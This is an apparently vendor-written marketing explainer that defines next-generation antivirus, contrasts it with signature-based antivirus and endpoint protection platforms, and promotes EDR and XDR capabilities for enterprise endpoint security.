What is next-generation antivirus (NGAV)
Next-generation antivirus (NGAV) software helps companies detect, respond to and prevent all kinds of cyberattack tactics, techniques and procedures (TTPs). While there is no one set definition for NGAV, it is generally accepted that NGAV technologies supplement traditional antivirus software – which relies on signature files or definition-based threats to identify attacks – with at least one “advanced feature,” such as artificial intelligence, allowing for more advanced threat prevention.
The term “next-gen antivirus” is sometimes used interchangeably with “endpoint protection” (EPP), though the latter refers to platforms that are often associated with a more robust feature set, including host-based firewalls, device control, sandboxing, endpoint management and application control.
Why Companies Need NGAV Capabilities
Modern, adaptive endpoint protection is crucial because today’s cyberattackers are increasingly breaking into individual networks in ways that bypass traditional antivirus software. The biggest security gaps exist at endpoints, such as desktop computers, laptops and mobile devices, where most companies have neither the time nor resources to address all the vulnerabilities that leave them open to attacks or breaches. In fact, Ponemon Institute’s 2017 State of Endpoint Security report found that, among companies that experienced an endpoint attack and were compromised, 77% said it was a fileless attack or exploit.
Traditional signature-based antivirus is ineffective against advanced threats such as script-based, multi-vector and fileless attacks, as well as advanced ransomware. This leads to significant gaps in a company’s security posture. What’s more, virtual endpoints often lack broader contextual intelligence to ensure an effective enterprise security architecture.
Without comprehensive, consistent and coordinated prevention measures, a company cannot successfully detect and respond to potential attacks in time to prevent significant damage. Consequently, relying on traditional antivirus software is not enough to protect companies from today’s security threats. Companies have to do more.
The Value and Benefits of NGAV
Advanced endpoint security solutions utilizing artificial intelligence can offer companies far more sophisticated protection than traditional antivirus solutions, as they proactively detect and identify threats, including never-before-seen malware and exploits. This enables companies to focus on how attackers are approaching and interacting with their enterprise systems and prevent those attacks, instead of just dealing with security-related incidents after the fact.
What Companies Need to Protect Their Sensitive Data
While NGAV is a major step up from traditional antivirus, the endpoint security market has progressed significantly, and now offers solutions that bundle together NGAV with detection and response capabilities. Leading endpoint protection features are often included in solutions categorized as endpoint detection and response (EDR), or in the more comprehensive extended detection and response (XDR) category, which stitches together data from across sources to improve the fidelity of detections and the ease of investigations. The reality is that enterprises can’t block 100% of attacks while maintaining business continuity, so they need to be able to detect, investigate and respond to threats as a critical second layer of defense behind their endpoint protection. For companies to get the best endpoint security, they need to fully protect their networks. They should look to deploy capabilities beyond those generally included in NGAV, such as the ability to:
- Identify and block security-related attacks at all stages of the attack lifecycle.
- Gain holistic visibility across the entire network infrastructure (e.g., endpoints, network, clouds).
- Coordinate between detection and prevention capabilities to deliver consistent security across the entire network.
- Safeguard all endpoints, regardless of operating system, whether an endpoint is on-site or remote, online or offline, connected to the company’s network or not.
- Protect both virtual and cloud environments.
- Take a proactive approach to security by combining multiple methods of prevention to automatically identify and stop potential security attacks, the execution of malicious programs and/or the exploitation of legitimate applications in real time. This includes limiting where executable files can run on an endpoint and customizing settings, if needed.
- Deliver more accurate security verdicts (e.g., malicious or benign) and minimize the number of false positive alerts.
All of this can allow companies to dramatically shorten the time it takes to discover, hunt down, investigate and respond to potential security attacks. The market-leading XDR solutions offer all these capabilities and more.
For more information on protecting your network, visit our website.
More Next-Generation Antivirus and XDR Resources